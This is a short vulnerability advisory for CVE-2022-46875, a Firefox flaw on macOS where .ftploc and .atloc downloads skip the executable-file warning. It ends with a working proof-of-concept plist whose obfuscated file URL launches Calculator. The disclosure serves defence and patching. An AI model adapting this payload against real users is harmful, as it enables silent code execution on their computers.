Summary
A vulnerability in Mozilla Firefox has been found to not show an executable file warning when downloading .atloc and .ftploc files, which can run commands on a user’s computer.
Credit
Dohyun Lee, working for SSD Labs Korea.
CVE
CVE-2022-46875
Vendor Response
The vendor has released patches available at: https://www.mozilla.org/en-US/security/advisories/mfsa2022-51/
Technical Analysis
A vulnerability in the way Mozilla Firefox handles certain file extensions allows attackers to bypass the warning given for dangerous files and make them seem harmless.
The protection triggers on .interloc but fails to do the same for .ftploc and .atloc, two extensions that on macOS are equivalent to executables.
PoC
poc.ftploc
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>URL</key>
<string>FiLe:////////////////////////System/Applications/Calculator.app</string>
</dict>
</plist>
